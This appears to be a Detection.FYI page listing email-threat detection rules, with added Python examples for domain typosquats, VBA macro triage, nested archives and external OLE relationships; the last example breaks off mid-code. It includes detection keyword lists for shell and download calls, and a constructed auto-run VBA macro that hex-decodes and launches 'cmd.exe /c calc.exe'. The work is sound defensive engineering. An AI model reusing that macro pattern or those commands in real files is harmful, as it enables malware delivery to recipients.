Detection.FYI
  • Attachment: Self-sender PDF with minimal content and view prompt

    Feb 12, 2026

    Detects messages where the sender and recipient are the same address with a PDF attachment containing only 'VIEW PDF' text and a standardized body message requesting to view the attachment.
  • Brand impersonation: Dropbox

    Feb 12, 2026

    Impersonation of Dropbox, a file sharing service.
  • Brand impersonation: TikTok

    Feb 12, 2026

    Detects messages impersonating TikTok through similar display names or logo detection, combined with security-themed content and authentication failures. Excludes legitimate TikTok communications and trusted senders.
  • Open redirect: embluemail.com

    Feb 12, 2026

    Message contains use of the embluemail.com redirect. This has been exploited in the wild.
  • Link: PDF filename impersonation with credential theft language

    Feb 12, 2026

    Detects messages where the link display text mimics a PDF filename containing the sender's domain name, combined with credential theft language or suspicious requests. The message is sent to an invalid recipient address or to the sender themselves, indicating potential abuse of email infrastructure.
  • Brand impersonation: Google Meet with malicious link

    Feb 12, 2026

    Detects messages with 'Join with Google Meet' display text that redirects to domains other than meet.google.com.
  • Callback Phishing via Zoom comment

    Feb 11, 2026

    Detects callback scams sent through legitimate Zoom infrastructure that impersonate well-known brands like McAfee, Norton, or PayPal. These messages contain purchase or support-related language along with phone numbers, attempting to trick recipients into calling fraudulent support lines.
  • PayPal invoice abuse

    Feb 11, 2026

    A fraudulent invoice/receipt found in the body of the message, sent by exploiting PayPal's invoicing service. Callback phishing is an attempt by an attacker to solicit the victim (recipient) to call a phone number. The resulting interaction could lead to a multitude of attacks, ranging from financial theft to Remote Access Trojan (RAT) installation or ransomware deployment.
  • Attachment: QR code with recipient targeting and special characters

    Feb 9, 2026

    Detects messages with a QR code in an attachment whose URL contains special characters in the path and includes the recipient's email address in either the URL path or fragment, potentially encoded in base64. The URLs have a simple path structure and may end with suspicious patterns.
  • Anthropic Magic String in HTML

    Feb 9, 2026

    Detects messages containing the specific test string 'ANTHROPIC_MAGIC_STRING' in the plain text body content.
  • Brand impersonation: Navan

    Feb 9, 2026

    Impersonation of the expense management provider Navan.
  • Attachment: cmd file extension

    Feb 9, 2026 · Attack surface reduction

    Detects messages containing CMD (Command Prompt) batch files, either as direct attachments or within compressed archives. CMD files can execute arbitrary system commands and are commonly used to deliver malware or perform unauthorized system modifications.
  • Reconnaissance: Empty subject with mismatched reply-to from new sender

    Feb 6, 2026 · Attack surface reduction

    Message with no subject line from a new sender where the reply-to address differs from the sender address, potentially indicating header manipulation or impersonation tactics.
  • Link: Suspicious go.php redirect with document lure

    Feb 6, 2026

    Detects links containing a PHP redirect endpoint with authentication parameters, commonly used in malicious redirects and unauthorized access attempts.
  • Link: URL shortener with copy-paste instructions and credential theft language

    Feb 6, 2026

    Detects messages containing only URL shorteners with copy-paste instructions and high-confidence credential theft language, typically used to evade URL analysis by requiring manual URL entry.
  • Brand Impersonation: Disney

    Feb 6, 2026

    Detects messages from senders impersonating Disney through display name spoofing or brand logo usage, combined with security-themed content and suspicious authentication patterns.
  • New link domain (<=10d) from untrusted sender

    Feb 6, 2026 · Attack surface reduction

    Detects links in the body of an email from an untrusted sender where the linked domain is less than 10 days old.
  • Link: SharePoint filename matches org name

    Feb 6, 2026

    Detects messages claiming to share files via SharePoint or OneDrive where the shared file name pattern matches the organizational naming pattern, indicating potential abuse of legitimate file sharing services to impersonate organizations.
  • Brand impersonation: Microsoft Teams invitation

    Feb 6, 2026

    Detects messages impersonating Microsoft Teams invites by matching known invite text patterns while containing join links that do not resolve to Microsoft domains. Additional verification includes checking for absent phone dial-in options and missing standard Teams help text or HTML meeting components.
  • Service abuse: Apple TestFlight with suspicious developer reference

    Feb 6, 2026

    Detects legitimate Apple TestFlight emails that reference potentially suspicious developers or apps, including variations of OpenAI, ChatGPT, or Meta in the app description or developer name fields.
  • Canva infrastructure abuse

    Feb 6, 2026

    A fraudulent invoice/receipt found in the body of the message sent by exploiting Canva's design sharing feature.
  • Brand impersonation: Microsoft Planner with suspicious link

    Feb 6, 2026

    Impersonation of Microsoft Planner, a component of the Microsoft 365 software suite.
  • Brand impersonation: Fake Fax

    Feb 5, 2026

    Detects messages containing fax-related language and notification elements from senders outside of known legitimate fax service providers.
  • Credential phishing: Generic document sharing

    Feb 5, 2026

    Detects credential phishing attempts using generic document sharing language where the sender claims to have sent a document for review, but the link doesn't point to legitimate file sharing services.
  • Brand impersonation: DocuSign

    Feb 5, 2026

    Attack impersonating a DocuSign request for signature.
  • Reconnaissance: All recipients cc/bcc'd or undisclosed

    Feb 5, 2026 · Attack surface reduction · Deliverability testing

    Recon messages, a form of deliverability testing, are used to validate whether a recipient address is valid or not, potentially preceding an attack.

    All recipients are bcc'd or undisclosed, with no links or attachments, and a short body and subject from an unknown sender.
  • Brand impersonation: Zoom via lookalike domain

    Feb 5, 2026

    Message contains a single link which attempts to spoof a 'zoom' link, sent from a free email provider to a single recipient.
  • ClickFunnels link infrastructure abuse

    Feb 5, 2026

    Email contains a ClickFunnels (mass mailing platform) tracking link but does not originate from ClickFunnels sending infrastructure. The myclickfunnels.com domain has been abused by threat actors to attempt credential phishing.
  • Brand impersonation: Meta and subsidiaries

    Feb 5, 2026

    Impersonation of Meta or Meta's subsidiaries Facebook and Instagram.
  • Attachment: Legal themed message or PDF with suspicious indicators

    Feb 5, 2026

    Detects messages with short body content or emoji containing PDF attachments from suspicious creators that include legal and compliance language with embedded malicious links, URL shorteners, or newly registered domains.
  • macOS malware: Compiled AppleScript with document double-extension

    Feb 5, 2026 · Attack surface reduction

    Detects compiled AppleScript files (.scpt) with document double-extensions (e.g., .docx.scpt, .pdf.scpt) commonly used in DPRK-attributed macOS malware campaigns. These files open in Script Editor when double-clicked and use social engineering (fake compatibility errors) to trick users into executing malicious reconnaissance scripts that fetch subsequent payload stages.
  • Attachment: PDF contains W9 or invoice YARA signatures

    Feb 4, 2026

    PDF attachment matches YARA signatures commonly associated with fraudulent W9 tax forms or invoice documents, which are frequently used in social engineering attacks to steal sensitive information or facilitate business email compromise.
  • Brand impersonation: Netflix

    Feb 3, 2026

    Impersonation of Netflix.
  • Link: Common hidden directory observed

    Feb 3, 2026 · Attack surface reduction

    Links in the message point to sensitive system directories like .git, .env, or .well-known that could expose confidential configuration data or system files. Actors will often abuse these directories to hide credential phishing landing pages of compromised sites.
  • Brand impersonation: Microsoft

    Feb 3, 2026

    Impersonation of the Microsoft brand.
  • Suspicious display name: Gmail sender with engaging language

    Feb 3, 2026

    Detects Gmail senders using display names with suspicious language patterns commonly associated with social engineering tactics, including urgency indicators, contact requests, and verification prompts.
  • Service abuse: Trello board invitation with VIP impersonation

    Feb 3, 2026

    Detects fraudulent Trello board invitations that impersonate organization VIPs by using organization domain names in board titles and including notes purportedly from legitimate company executives.
  • Brand impersonation: Marriott with gift language

    Feb 2, 2026

    Detects messages impersonating the Marriott brand that contain gift-related language such as 'appreciation gift', 'thank you gift', or 'something special' from senders not associated with legitimate Marriott domains.
  • Service abuse: WeTransfer callback scam

    Jan 30, 2026

    Detects callback scams originating from the legitimate WeTransfer noreply address, using natural language processing to identify high-confidence callback scam intent in the message body.
  • Impersonation: Executive using numbered local part

    Jan 30, 2026

    Detects messages from free email providers where the sender's email address uses a pattern commonly associated with executive impersonation, containing 'chair' or 'ceo' followed by numbers in the local part.
  • Link: 9WOLF phishkit initial landing URI

    Jan 30, 2026

    Detects links containing the '?ai=xd' query parameter associated with 9wolf phishing service initial landing pages.
  • Link: Suspicious URL with recipient targeting and special characters

    Jan 30, 2026

    Detects messages containing links with special characters in the path that include the recipient's email address in either the URL path or fragment, potentially encoded in base64. The URLs have a simple path structure and may end with suspicious patterns.
  • Attachment: QR code with encoded recipient targeting and redirect indicators

    Jan 30, 2026

    Detects QR codes in attachments that contain the recipient's email address (either plaintext or base64 encoded) and redirect through suspicious URI structures commonly associated with Kratos/SneakyLog redirection services.
  • VIP impersonation with w2 request

    Jan 29, 2026

    This rule detects emails attempting to impersonate a VIP requesting a W-2.
  • Link: URL fragment with hexadecimal pattern obfuscation

    Jan 29, 2026

    Detects links containing URL fragments with repeating hexadecimal patterns, commonly used to obfuscate malicious destinations or bypass security filters.
  • Attachment: ICS with embedded Javascript in SVG file

    Jan 29, 2026

    Detects incoming messages containing ICS attachments with embedded SVG files that contain malicious JavaScript code, including base64-encoded content and potentially harmful event handlers. The rule specifically watches for onload events, location redirects, error handlers, and iframe elements with base64 data URIs.
  • Link: HTML file with suspicious binary fragment ending pattern

    Jan 29, 2026

    Detects links to HTML files containing fragments with a suspicious pattern of alphanumeric characters followed by a 5-digit binary sequence, commonly used in malicious URL structures.
  • Link: Base64 encoded recipient address in URL fragment with hex subdomain

    Jan 29, 2026

    Detects links containing a 40-character hexadecimal subdomain with the recipient's email address base64 encoded in the URL fragment, a technique used to personalize malicious links and evade detection.
  • Attachment: Excel file with document sharing lure created by Go Excelize

    Jan 29, 2026

    Detects Excel macro files created with the Go Excelize library containing document sharing language such as 'sent document', 'shared file', or 'REVIEW DOCUMENT'. These files are often used as lures to trick users into enabling macros or downloading malicious content.
  • Attachment: Office file with document sharing and browser instruction lures

    Jan 29, 2026

    Detects macro-enabled attachments containing document sharing language (sent, shared, forwarded) combined with browser interaction instructions (copy, right-click) or common email disclaimers. These tactics are often used to trick users into enabling macros or following malicious instructions.
  • Brand impersonation: Office 365 mail service

    Jan 29, 2026

    Detects messages from domains containing both 'o365' and 'mail' in the second-level domain, commonly used to impersonate legitimate Microsoft Office 365 mail services.
  • Link: Mamba 2FA phishing kit

    Jan 28, 2026

    Detects links containing base64-encoded parameters characteristic of the Mamba 2FA phishing kit, specifically looking for 'sv=o365' and '&uid=USER' patterns in redirect history.
  • Impersonation: Internal corporate services

    Jan 28, 2026

    Detects phishing attempts that impersonate corporate services such as HR, helpdesk, and benefits, using specific language in the subject or sender's name and containing suspicious links from low-reputation or mass-mailing domains.
  • Brand impersonation: Aramco

    Jan 28, 2026

    Impersonation of the petroleum and natural gas company Saudi Aramco.
  • Attachment: Employment contract update with suspicious file naming

    Jan 28, 2026

    Detects messages containing two attachments where one is a PowerPoint file with suspicious character substitution in the filename ('Empl0yment' using zero instead of 'o') and body text claiming an employment contract has been updated.
  • Attachment: MS Office or RTF file with Shell.Explorer.1 com object with embedded LNK

    Jan 28, 2026 · Attack surface reduction

    Detects embedded Shell.Explorer.1 COM objects containing LNK files within various file types.
  • Reconnaissance: Hotel booking reply-to redirect

    Jan 27, 2026

    Detects messages posing as hotel booking inquiries, identified by common hotel-related language patterns, where the reply-to address is at a free email provider and differs from the sender domain. Such messages are used to validate whether a recipient address is valid or not, potentially preceding an attack.
  • Reconnaissance: Short generic greeting message

    Jan 27, 2026 · Attack surface reduction

    Detects potential reconnaissance messages with very short, generic content like 'Hi' or 'Hello' from external senders. These messages are often used to validate email addresses and test deliverability before launching larger attacks.
  • Link: Recipient email address in 'eta' parameter

    Jan 27, 2026

    Detects links containing the recipient's email address in the 'eta' query parameter, a technique commonly used to personalize malicious links and track targets.
  • Link: Microsoft Dynamics 365 form phishing

    Jan 27, 2026

    The email body is suspicious and links to a Microsoft Dynamics form, a known phishing tactic.
  • Service abuse: Monday.com callback scam

    Jan 26, 2026

    Detects callback scam solicitations originating from Monday.com's notification system using natural language understanding to identify fraudulent callback language in the message body.
  • Attachment: Fake lawyer & sports agent identities

    Jan 26, 2026

    Detects messages containing attachments or content that reference known fake identities used in FC Barcelona scams, including fake lawyer Michael Gerardus Hermanus Demon and sports agents with the surname Giuffrida. The rule examines EXIF metadata, OCR text from attachments, and message body content for these specific identity markers.
  • Attachment: ICS file with meeting prefix

    Jan 26, 2026

    Detects incoming messages with a single ICS calendar file attachment that has a filename starting with 'meeting_'.
  • Headers: Fake in-reply-to with wildcard sender and missing thread context

    Jan 23, 2026

    Detects messages claiming to be replies with In-Reply-To headers but lacking previous thread context, sent from addresses containing multiple wildcard characters in the local part.
  • PhaaS: Impact Solutions (Impact Vector Suite)

    Jan 23, 2026

    Identifies the use of the Impact Solutions PhaaS.

    Impact Vector Suite is a full-spectrum payload delivery platform, engineered for stealth-optimized execution across all major deployment vectors.
  • Link: Personal SharePoint with invalid recipients and credential theft language

    Jan 23, 2026

    Detects messages with undisclosed or invalid recipients containing a single link to a personal SharePoint domain (with '-my' pattern) and high-confidence credential theft language in a short message body.
  • Brand impersonation: File sharing notification with template artifacts

    Jan 23, 2026

    Detects messages impersonating file sharing services that contain template artifacts such as placeholder comments, incomplete HTML elements, and development remnants. The message includes 'shared with you' language and exhibits multiple indicators of being generated from a malicious template including HTML comments with development terms, broken anchor tags, and filename elements that closely match the subject line.
  • Link: Tycoon2FA phishing kit (non-exhaustive)

    Jan 23, 2026

    Detects links utilizing the Tycoon2FA phishing kit, identified by specific DOM structure patterns and CDN characteristics, combined with suspicious domain indicators such as free subdomain hosts or suspicious TLDs. As the Tycoon2FA kit is evolving, this rule will not detect all variants of Tycoon2FA phishing, and is designed to complement existing and future detections.
  • Service abuse: Adobe legitimate domain with document approval language

    Jan 23, 2026 · Attack surface reduction

    Detects messages from Adobe's legitimate email domain containing suspicious language about document or payment approval that may indicate service abuse.
  • Extortion / sextortion (untrusted sender)

    Jan 22, 2026

    Detects extortion and sextortion attempts by analyzing the email body text from an untrusted sender.
  • BEC/Fraud: Romance scam

    Jan 22, 2026

    This rule detects messages attempting to initiate a romance scam. The rule leverages tells such as undisclosed recipients, freemail addresses in the body, and common scam phrasing. Romance scams are deceptive schemes where scammers establish false romantic intentions towards individuals to gain their trust and eventually exploit them financially.
  • Fake voicemail notification (untrusted sender)

    Jan 22, 2026

    This rule detects a common credential phishing vector enticing the user to engage with links under the premise that they have a voicemail to retrieve. The rule looks for voicemail verbiage in the display name, body, subject, or a combination of those elements with emojis or a medium to high credential theft NLU intent from a first-time, unsolicited sender.
  • Service abuse: Microsoft Power BI callback scam

    Jan 22, 2026

    Detects callback scam content sent from the legitimate Microsoft Power BI service email address, indicating potential service abuse to distribute fraudulent callback solicitations.
  • Callback phishing in body or attachment (untrusted sender)

    Jan 22, 2026

    Detects callback scams by analyzing text within images of receipts or invoices from untrusted senders.
  • Callback phishing via calendar invite

    Jan 22, 2026

    Detects calendar invites containing callback phishing language in the DESCRIPTION of the invite.
  • Brand impersonation: AuthentiSign

    Jan 21, 2026

    Detects messages impersonating AuthentiSign through display name, domain, subject, or body content that originate from either non-AuthentiSign or spoofed domains.
  • Attachment: PDF with recipient email in link

    Jan 21, 2026

    Detects PDF attachments that contain the recipient's domain in the filename and include a single link personalized with the recipient's email address, either in the URL directly, encoded in base64, or within a QR code.
  • Attachment: Password-protected PDF with fake document indicators

    Jan 21, 2026

    Detects PDF attachments that are password protected and match YARA signatures looking for specific content observed in previous activity.
  • Brand impersonation: Blockchain[.]com

    Jan 21, 2026

    Impersonation of Blockchain[.]com, usually for credential theft.
  • Attachment: Invoice and W-9 PDFs with suspicious creators

    Jan 21, 2026

    Detects messages containing two PDF attachments where one has invoice-related naming patterns and another contains W-9 tax form indicators, with at least one PDF generated by Chrome or wkhtmltopdf tools, commonly used in business email compromise attacks targeting financial processes.
  • Link: Display text with excessive right-to-left mark characters

    Jan 21, 2026

    Detects links where the display text contains a high concentration of Unicode right-to-left mark characters (U+200F), which may be used to obfuscate or manipulate the visual representation of the link text to deceive recipients.
  • Link: Self-sent message with quarterly document review request

    Jan 21, 2026

    Detects messages sent from a user to themselves containing a link with quarterly indicators (q1_, q2_, q3_, q4_) and specific document review language requesting urgent feedback.
  • Job scam with specific salary pattern

    Jan 21, 2026

    Detects job scam content that includes specific weekly salary mentions (e.g., '$XXX weekly' patterns) in either the current email thread or previous thread conversations, while excluding legitimate income verification services.
  • Link: Excessive URL rewrite encoders

    Jan 21, 2026 · Attack surface reduction

    Detects URLs with many (excessive) encoding patterns, including multiple instances of the same encoder or four or more distinct encoders. These techniques are commonly used to obfuscate malicious URLs and evade security filters.
  • Brand impersonation: USPS

    Jan 20, 2026

    Impersonation of the United States Postal Service.
  • Link: Breely link masquerading as PDF

    Jan 16, 2026

    Detects messages containing a single Breely link that displays as a PDF file. Typically, the link redirects to a different destination for malicious purposes.
  • Brand impersonation: Xodo Sign

    Jan 16, 2026

    Detects messages impersonating Xodo Sign with 'Processed by Xodo Sign' text from unauthorized senders that fail DMARC authentication.
  • Service abuse: GetAccept callback scam content

    Jan 16, 2026

    Detects callback scam language in messages sent through legitimate GetAccept infrastructure, indicating potential abuse of the service for fraudulent solicitation.
  • BEC: Employee impersonation with subject manipulation

    Jan 16, 2026

    Subject matches the display name of someone in your organization, and the body resembles a BEC attack.
  • Request for Quote or Purchase (RFQ|RFP) with suspicious sender or recipient pattern

    Jan 15, 2026

    RFQ/RFP scams involve fraudulent emails posing as legitimate requests for quotations or purchases, often sent by scammers impersonating reputable organizations. These scams aim to deceive recipients into providing sensitive information or conducting unauthorized transactions, often leading to financial loss or data leakage.
  • Brand impersonation: Quickbooks

    Jan 15, 2026

    Impersonation of the Quickbooks service from Intuit.
  • Spam: Commonly observed formatting of unauthorized free giveaways

    Jan 14, 2026

    Detects commonly observed formatting of unauthorized giveaways, free tools, and products by multiple different brands.
  • Subject: Suspicious bracketed reference

    Jan 12, 2026

    Detects messages with subject lines containing bracketed patterns that follow a specific format with repeated characters, numeric sequences, and structured tracking identifiers commonly used in malicious automated messaging systems.
  • Brand impersonation: SendGrid

    Jan 12, 2026

    Detects inbound messages that impersonate Twilio/SendGrid through display name or domain manipulation, combined with security or authentication-themed content, while failing authentication checks and originating from untrusted sources.
  • Vendor impersonation: Thread hijacking with typosquat domain

    Jan 12, 2026

    Detects potential thread hijacking where the sender uses a domain similar to known senders, exhibits BEC behavior, and shows signs of compromised thread continuity through domain spoofing or thread manipulation.

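
A first-pass "domain similar to known senders" check for the rule above, as an added example that is not part of the Detection.FYI page or of the rule itself. It folds common homoglyph substitutions, then measures edit distance between the sender domain and an assumed list of known vendor domains. The domain list, the homoglyph table and the distance threshold are assumptions for this example; public-suffix handling (for example .co.uk) is deliberately left out.

```python
import unicodedata

# Assumed list of domains your organization has previously exchanged mail with.
KNOWN_SENDER_DOMAINS = frozenset({"acme-supplies.com", "contoso.com", "fabrikam.net"})

# Look-alike substitutions seen in typosquats; an illustrative subset, not a full table.
HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def normalize(domain: str) -> str:
    """Lowercase, strip accents, and fold look-alike sequences to their targets."""
    d = unicodedata.normalize("NFKD", domain.strip().lower())
    d = "".join(c for c in d if not unicodedata.combining(c))
    for src, dst in HOMOGLYPHS:
        d = d.replace(src, dst)
    return d


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute), O(len(a) * len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def classify_sender_domain(domain: str, known=KNOWN_SENDER_DOMAINS, max_distance: int = 2) -> dict:
    """known: exact match. lookalike: homoglyph-equal, within max_distance edits,
    or the same name under a different TLD. unrelated: everything else."""
    d = domain.strip().lower()
    if d in known:
        return {"verdict": "known", "closest": d, "distance": 0}
    nd = normalize(d)
    best = min(known, key=lambda k: levenshtein(nd, normalize(k)))
    dist = levenshtein(nd, normalize(best))
    same_name_other_tld = d.rsplit(".", 1)[0] == best.rsplit(".", 1)[0]
    if dist <= max_distance or same_name_other_tld:
        return {"verdict": "lookalike", "closest": best, "distance": dist}
    return {"verdict": "unrelated", "closest": best, "distance": dist}


if __name__ == "__main__":
    for d in ("acme-supplies.com", "acrne-supplies.com", "acme-suplies.com",
              "acme-supplies.net", "example.org"):
        print(d, classify_sender_domain(d))
```

Edit distance alone misses "acrne" for "acme" (distance 2 on a short label is noisy), which is why the homoglyph fold runs first; the TLD swap is caught separately because it costs three edits yet is one of the cheapest typosquats to register.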
  • Attachment soliciting user to enable macros

    Jan 12, 2026

    Recursively scans files and archives to detect documents that ask the user to enable macros, including if that text appears within an embedded image.

  • Attachment with auto-executing macro (unsolicited)

    Jan 12, 2026

    Attachment from an unsolicited sender contains a macro that will auto-execute when the file is opened.

    Macros are a common phishing technique used to deploy malware.

  • Attachment with auto-opening VBA macro (unsolicited)

    Jan 12, 2026

    Recursively scans files and archives to detect embedded VBA projects with an auto-open procedure (for example AutoOpen or Document_Open) that executes as soon as the document is opened.

  • Attachment with high risk VBA macro (unsolicited)

    Jan 12, 2026

    Potentially malicious attachment containing a VBA macro. oletools (olevba) categorizes the macro risk as 'high'.

  • Attachment with macro calling executable

    Jan 12, 2026

    Recursively scans files and archives to detect embedded VBA projects containing a hex-encoded string that references an executable (.exe).

    This may be an attempt to heavily obfuscate execution launched from a Microsoft Office document.

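
A static triage pass over extracted VBA source covering the three macro rules above (auto-open procedure, high-risk keywords, hex-encoded executable reference). This is an added example, not the rules' own logic and not olevba: the keyword list and the risk scoring are assumptions loosely modelled on olevba's AutoExec, Suspicious and Hex String categories, and the VBA module is constructed. In practice the source is first extracted with olevba or oledump; this code only looks at the text.

```python
import re

# Constructed VBA module, standing in for source extracted from a document
# (e.g. with oletools' olevba). The hex string decodes to "cmd.exe /c calc.exe".
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    Dim h As String, s As String, i As Integer
    h = "636d642e657865202f632063616c632e657865"
    For i = 1 To Len(h) Step 2
        s = s & Chr(CLng("&H" & Mid(h, i, 2)))
    Next i
    CreateObject("WScript.Shell").Run s, 0
End Sub
'''

# Procedures Office runs automatically when the file is opened.
AUTOEXEC = re.compile(
    r"\b(?:Sub|Function)\s+(AutoOpen|Auto_Open|Document_Open|Workbook_Open|AutoExec)\b",
    re.IGNORECASE,
)
# Assumed subset of the keywords olevba reports as Suspicious.
SUSPICIOUS = re.compile(
    r"\b(CreateObject|WScript\.Shell|ShellExecute|Shell|URLDownloadToFile|Environ|Chr|CallByName)\b",
    re.IGNORECASE,
)
# Quoted literals of even length made only of hex digits, long enough to hold a filename.
HEX_STRING = re.compile(r'"((?:[0-9A-Fa-f]{2}){6,})"')
EXE_REF = re.compile(r"\.(exe|dll|scr|bat|cmd|ps1)\b", re.IGNORECASE)


def decode_hex_strings(src: str) -> list[str]:
    """Decode hex-looking string literals that yield printable ASCII."""
    decoded = []
    for m in HEX_STRING.finditer(src):
        raw = bytes.fromhex(m.group(1))
        if all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded


def triage_vba(src: str) -> dict:
    autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(src)})
    suspicious = sorted({m.group(1) for m in SUSPICIOUS.finditer(src)}, key=str.lower)
    decoded = decode_hex_strings(src)
    exe_refs = [d for d in decoded if EXE_REF.search(d)]
    # Scoring is an assumption for this example, not olevba's scale: an auto-exec
    # trigger combined with an obfuscated executable reference or a shell call is "high".
    launches = {"createobject", "shell", "wscript.shell", "shellexecute"}
    if autoexec and (exe_refs or launches & {s.lower() for s in suspicious}):
        risk = "high"
    elif autoexec or suspicious:
        risk = "medium"
    else:
        risk = "low"
    return {"autoexec": autoexec, "suspicious": suspicious,
            "decoded_hex": decoded, "exe_refs": exe_refs, "risk": risk}


if __name__ == "__main__":
    for k, v in triage_vba(SAMPLE_VBA).items():
        print(f"{k}: {v}")
```

The hex decode is the piece that matters for the third rule: keyword matching alone sees only Chr, Mid and CreateObject, and it is the decoded literal that exposes the .exe reference the obfuscation was meant to hide.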
  • Attachment with VBA macros from employee impersonation (unsolicited)

    Jan 12, 2026

    Attachment contains a VBA macro from a sender your organization has never sent an email to.

    Sender is using a display name that matches the display name of someone in your organization.

    VBA macros are a common phishing technique used to deploy malware.

  • Attachment: .csproj with suspicious commands

    Jan 12, 2026 · Suspicious attachment

    Attached .csproj file contains suspicious commands.

  • Attachment: 7z Archive Containing RAR File

    Jan 12, 2026 · Attack surface reduction

    Detects 7z archive attachments that contain RAR files, which may be used to evade detection by nesting compressed file formats.

  • Attachment: Any HTML file within archive (unsolicited)

    Jan 12, 2026 · Attack surface reduction

    Recursively scans archives to detect HTML files from unsolicited senders.

    HTML files can be used for HTML smuggling and embedded in archives to evade detection.

  • Attachment: Archive containing disallowed file type

    Jan 12, 2026 · Attack surface reduction

    Recursively scans archives to detect disallowed file types. File extensions can be detected within password-protected archives.

    Attackers often embed malicious files within archives to bypass email gateway controls.

  • Attachment: Archive with pdf, txt and wsf files

    Jan 12, 2026 · Malfam: QakBot

    Detects a known QakBot delivery method: a zip file containing pdf, txt and wsf files at a depth of 1.

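
A recursive archive walk serving both the "archive containing disallowed file type" rule and the QakBot pdf/txt/wsf-at-depth-1 rule above, as an added example that is not the rules' own implementation. It descends into nested zips, records the depth of every member, and reads names and the encryption flag from the central directory, which is why extensions are visible even in password-protected archives. The disallowed-extension list and the sample archive are constructed for this example.

```python
import io
import zipfile
from dataclasses import dataclass

# Assumed policy list; adjust to what your gateway blocks.
DISALLOWED = {"exe", "wsf", "js", "vbs", "hta", "scr", "lnk", "iso", "html"}
QAKBOT_SHAPE = {"pdf", "txt", "wsf"}


@dataclass
class Entry:
    path: str       # slash-joined path through nested archives
    depth: int      # 1 = directly inside the attachment
    ext: str        # lowercased extension, "" if none
    encrypted: bool


def _ext(name: str) -> str:
    base = name.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def walk_zip(data: bytes, prefix: str = "", depth: int = 1, max_depth: int = 5) -> list[Entry]:
    """List every member of a zip, descending into nested zips.

    Member names and the encryption bit live in the central directory, so they are
    readable without the password; only member contents need it, and those are
    only read here to recurse into a nested, unencrypted zip.
    """
    entries: list[Entry] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = f"{prefix}{info.filename}"
            encrypted = bool(info.flag_bits & 0x1)  # general-purpose bit 0 = encrypted
            entries.append(Entry(path, depth, _ext(info.filename), encrypted))
            if _ext(info.filename) == "zip" and not encrypted and depth < max_depth:
                entries.extend(walk_zip(zf.read(info), path + "/", depth + 1, max_depth))
    return entries


def disallowed_members(entries: list[Entry]) -> list[str]:
    return [e.path for e in entries if e.ext in DISALLOWED]


def matches_qakbot_shape(entries: list[Entry]) -> bool:
    """pdf, txt and wsf all present directly inside the attachment (depth 1)."""
    top_level = {e.ext for e in entries if e.depth == 1}
    return QAKBOT_SHAPE <= top_level


def build_sample() -> bytes:
    """Constructed attachment: QakBot-shaped top level plus a nested zip holding an .exe."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("update.exe", b"MZ placeholder, not a real PE")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("invoice.pdf", b"%PDF-1.4 placeholder")
        z.writestr("readme.txt", b"open the script")
        z.writestr("run.wsf", b"<job><script language='JScript'>/* placeholder */</script></job>")
        z.writestr("more/tools.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    found = walk_zip(build_sample())
    for e in found:
        print(f"depth={e.depth} encrypted={e.encrypted} {e.path}")
    print("disallowed:", disallowed_members(found))
    print("qakbot shape:", matches_qakbot_shape(found))
```

The depth field is what lets the QakBot check stay precise (the lure files must sit directly in the attachment) while the disallowed-type check stays broad (any depth, since a nested archive is itself the evasion).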
  • Attachment: Calendar file with invisible Unicode characters

    Jan 12, 2026

    Detects calendar (.ics) attachments containing suspicious invisible Unicode characters, which may be used to hide malicious content or bypass security filters. The rule triggers on messages with calendar-related keywords in the subject or body.

  • Attachment: Callback phishing solicitation via image file

    Jan 12, 2026

    A fraudulent invoice or receipt found in an image attachment. Callback phishing is an attempt by an attacker to solicit the victim (recipient) to call a phone number. The resulting interaction could lead to a range of attacks, from financial theft to Remote Access Trojan (RAT) installation or ransomware deployment.

  • Attachment: CVE-2021-40444 - MSHTML Remote Code Execution Vulnerability

    Jan 12, 2026 · CVE-2021-40444

    Attachment contains an external relationship that attempts to load a remote OLE object, consistent with use in CVE-2021-40444.

    On September 7, 2021, Microsoft released details about a zero-day RCE vulnerability in MSHTML that affects Microsoft Windows.

    According to Microsoft: "we are aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine."

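
How the "external relationship loading a remote OLE object" condition can be checked on the package itself, as an added example and not the rule's own implementation: every .rels part in the OOXML zip is parsed and any oleObject relationship with TargetMode="External" is reported; a target using the mhtml: scheme is the specific shape reported for CVE-2021-40444. The .docx is constructed in memory with only the parts the check reads, and the target URL is a placeholder on a reserved domain.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
STYLES_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"


def build_sample_docx(ole_target: str, external: bool) -> bytes:
    """Constructed minimal package: enough parts for the check, not an openable document."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_REL}" Target="{ole_target}"{mode}/>'
        f'<Relationship Id="rId2" Type="{STYLES_REL}" Target="styles.xml"/>'
        f'</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", "<document/>")  # placeholder body, never parsed here
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def external_ole_relationships(package: bytes) -> list[dict]:
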